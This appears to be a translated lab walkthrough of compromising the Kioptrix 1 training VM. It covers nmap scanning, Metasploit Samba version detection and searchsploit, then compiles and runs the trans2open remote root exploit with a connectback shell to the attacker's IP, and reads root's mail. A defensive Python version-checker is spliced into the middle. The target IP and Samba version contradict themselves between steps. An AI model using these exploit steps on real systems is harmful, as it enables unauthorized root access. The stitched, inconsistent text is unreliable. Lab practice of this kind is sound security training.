Vulnhub Kioptrix 1 samba (Bahasa)

imam rahman
5 min read, Jun 25, 2018


This post walks through solving Kioptrix 1 by way of a security flaw in Samba. The attacker host runs Kali Linux inside VirtualBox with network adapter 1 (eth0) attached to a bridged adapter. The target host runs Kioptrix version 1 inside VMware, also with network adapter 1 (eth0) attached to a bridged adapter.

On the attacker side, run ifconfig eth0 in a terminal to find the attacker host's IP information on network adapter eth0.

mr@kali:~$ ifconfig eth0
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 192.168.1.11 netmask 255.255.255.0 broadcast 192.168.1.255
inet6 fe80::a00:27ff:fec5:d1c prefixlen 64 scopeid 0x20<link>
ether 08:00:27:c5:0d:1c txqueuelen 1000 (Ethernet)
RX packets 287457 bytes 19972637 (19.0 MiB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 320029 bytes 35413470 (33.7 MiB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

From the ifconfig output, the attacker's IP address on eth0 is 192.168.1.11 with netmask 255.255.255.0 (/24). The next step is to find the target's IP address. Several tools can do this, among them nmap and netdiscover; here we use nmap. On the attacker side, run nmap -e eth0 -sn 192.168.1.0/24 to perform host discovery with a ping scan on network card eth0 across the 192.168.1.0/24 network.

mr@kali:~$ nmap -e eth0 -sn 192.168.1.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-18 04:13 EDT
Nmap scan report for 192.168.1.1
Host is up (0.0055s latency).
Nmap scan report for 192.168.1.11
Host is up (0.0040s latency).
Nmap scan report for 192.168.1.13
Host is up (0.00041s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 11.51 seconds

The ping scan shows that the target host's IP is 192.168.1.13. Having found the target's IP address, the next step is service enumeration against it. Knowing which services, versions and ports are running on the target host is what makes exploitation of the host possible.

Scanning can be done with nmap. On the attacker side, run sudo nmap -sU -A -n --top-ports 200 -oN kioptrix1_nmap_udp.txt 192.168.1.13 to run a UDP scan against IP address 192.168.1.13 (the target).

mr@kali:~$ sudo nmap -sU -A -n --top-ports 200 -oN kioptrix1_nmap_udp.txt 192.168.1.13
Starting Nmap 7.70 ( https://nmap.org ) at 2018-06-18 04:21 EDT
Nmap scan report for 192.168.1.13
Host is up (0.00088s latency).
Not shown: 196 closed ports
PORT STATE SERVICE VERSION
111/udp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 1024/tcp status
|_ 100024 1 1024/udp status
137/udp open netbios-ns Samba nmbd netbios-ns (workgroup: MYGROUP)
138/udp open|filtered netbios-dgm
1024/udp open status 1 (RPC #100024)
MAC Address: 94:53:30:CB:88:5D (Hon Hai Precision Ind.)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop
Service Info: Host: KIOPTRIX
Host script results:
|_nbstat: NetBIOS name: KIOPTRIX, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
TRACEROUTE
HOP RTT ADDRESS
1 0.88 ms 192.168.1.13
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/.
Nmap done: 1 IP address (1 host up) scanned in 315.13 seconds

The Samba service (nmbd, netbios-ns on port 137) can be seen running on Kioptrix 1. It is worth first checking the Samba version with the auxiliary module in Metasploit. Run the following in the attacker's terminal:

mr@kali:~$ msfconsole -q
msf > search smb_version
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/scanner/smb/smb_version normal SMB Version Detection
msf > use auxiliary/scanner/smb/smb_version
msf auxiliary(scanner/smb/smb_version) > show options
Module options (auxiliary/scanner/smb/smb_version):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target address range or CIDR identifier
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
msf auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.1.12
RHOSTS => 192.168.1.12
msf auxiliary(scanner/smb/smb_version) > run
[*] 192.168.1.12:139 - Host could not be identified: Unix (Samba 2.2.1a)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_version) >

From the enumeration, the Samba version identified is Samba 2.2.0. Search for exploits that use security flaws in Samba 2.2 with the following command in the attacker's terminal.

mr@kali:~$ searchsploit samba 2.2
------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Samba 2.0.x/2.2 - Arbitrary File Creation | exploits/unix/remote/20968.txt
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit) | exploits/osx/remote/9924.rb
Samba 2.2.2 < 2.2.6 - 'nttrans' Remote Buffer Overflow (Metasploit) (1) | exploits/linux/remote/16321.rb
Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit) | exploits/bsd_x86/remote/16880.rb
Samba 2.2.8 (Linux Kernel 2.6 / Debian / Mandrake) - Share Privilege Escalation | exploits/linux/local/23674.txt
Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit) | exploits/linux_x86/remote/16861.rb
Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit) | exploits/osx_ppc/remote/16876.rb
Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit) | exploits/solaris_sparc/remote/16330.rb
Samba 2.2.8 - Brute Force Method Remote Command Execution | exploits/linux/remote/55.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1) | exploits/unix/remote/22468.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2) | exploits/unix/remote/22469.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3) | exploits/unix/remote/22470.c
Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (4) | exploits/unix/remote/22471.txt
Samba 2.2.x - 'nttrans' Remote Overflow (Metasploit) | exploits/linux/remote/9936.rb
Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow | exploits/unix/remote/22356.c
Samba 2.2.x - Remote Buffer Overflow | exploits/linux/remote/7.pl
Samba < 2.2.8 (Linux/BSD) - Remote Code Execution | exploits/multiple/remote/10.c
------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
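Before moving on to the exploit, a defender-side view of the same data, as an added example that is not part of the original post: the script below reads banner lines in the two formats seen above (the Metasploit smb_version banner and the nmap service table) and flags Samba builds older than 2.2.8a, the release that fixed the trans2open overflow the searchsploit listing points at. The threshold, the two extra hosts and all function names are my assumptions, not from the post.

```python
import re

# Constructed sample lines in the two formats seen above: the Metasploit
# smb_version banner and the nmap service table (the last two hosts are made up).
SAMPLE_LINES = [
    "[*] 192.168.1.12:139 - Host could not be identified: Unix (Samba 2.2.1a)",
    "137/udp open netbios-ns Samba nmbd netbios-ns (workgroup: MYGROUP)",
    "[*] 192.168.1.50:445 - Host could not be identified: Unix (Samba 2.2.8)",
    "[*] 192.168.1.51:445 - Host: Unix (Samba 3.0.20-Debian)",
]

# Samba 2.2.8a is the release that closed the trans2open hole used by the
# exploits searchsploit lists above (assumed threshold); anything older is flagged.
FIXED_VERSION = (2, 2, 8, "a")
SAMBA_RE = re.compile(r"Samba (\d+)\.(\d+)\.(\d+)([a-z]?)")
HOST_RE = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3}):(\d+)")

def parse_samba_version(text):
    """Return (major, minor, patch, suffix) or None if no version is present."""
    m = SAMBA_RE.search(text)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3)), m.group(4))

def is_pre_fix(version):
    """True when the version predates 2.2.8a (tuple order handles the 'a' suffix)."""
    return version < FIXED_VERSION

def triage(lines):
    """Return (host, version, verdict) for every line that mentions Samba."""
    findings = []
    for line in lines:
        if "Samba" not in line:
            continue
        host_m = HOST_RE.search(line)
        host = host_m.group(1) if host_m else "host not on this line"
        version = parse_samba_version(line)
        if version is None:
            verdict = "unknown"      # nmbd seen but no version: probe it
        elif is_pre_fix(version):
            verdict = "upgrade"      # inside the trans2open exploit range
        else:
            verdict = "ok"
        findings.append((host, version, verdict))
    return findings

if __name__ == "__main__":
    for host, version, verdict in triage(SAMPLE_LINES):
        print(f"{host:24} {str(version):20} {verdict}")
```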

Among the search results there is a remote code execution exploit that makes use of the flaw in Samba version 2.2.8. First copy that exploit into the user's home directory.

mr@kali:~$ cp /usr/share/exploitdb/exploits/multiple/remote/10.c /home/mr/

Compile the exploit file:

mr@kali:~$ sudo gcc -o kioptrix1 10.c

Run the exploit with no arguments to see the options it accepts:

mr@kali:~$ ./kioptrix1
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
Usage: ./kioptrix1 [-bBcCdfprsStv] [host]
-b <platform> bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B <step> bruteforce steps (default = 300)
-c <ip address> connectback ip address
-C <max childs> max childs for scan/bruteforce mode (default = 40)
-d <delay> bruteforce/scanmode delay in micro seconds (default = 100000)
-f force
-p <port> port to attack (default = 139)
-r <ret> return address
-s scan mode (random)
-S <network> scan mode
-t <type> presets (0 for a list)
-v verbose mode

Based on the options shown, run the following in the attacker's terminal:

mr@kali:~$ ./kioptrix1 -c 192.168.1.11 -b 0 192.168.1.13
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Bruteforce mode. (Linux)
+ Host is running samba.
+ Worked!
--------------------------------------------------------------
*** JE MOET JE MUIL HOUWE
Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown
uid=0(root) gid=0(root) groups=99(nobody)
/* note: whoami, id, and cat /var/mail/root were typed manually */
whoami

root
id
uid=0(root) gid=0(root) groups=99(nobody)
cat /var/mail/root
From root Sat Sep 26 11:42:10 2009
Return-Path: <root@kioptix.level1>
Received: (from root@localhost)
by kioptix.level1 (8.11.6/8.11.6) id n8QFgAZ01831
for root@kioptix.level1; Sat, 26 Sep 2009 11:42:10 -0400
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root <root@kioptix.level1>
Message-Id: <200909261542.n8QFgAZ01831@kioptix.level1>
To: root@kioptix.level1
Subject: About Level 2
Status: O
If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...

Done: Kioptrix level 1 has been rooted.
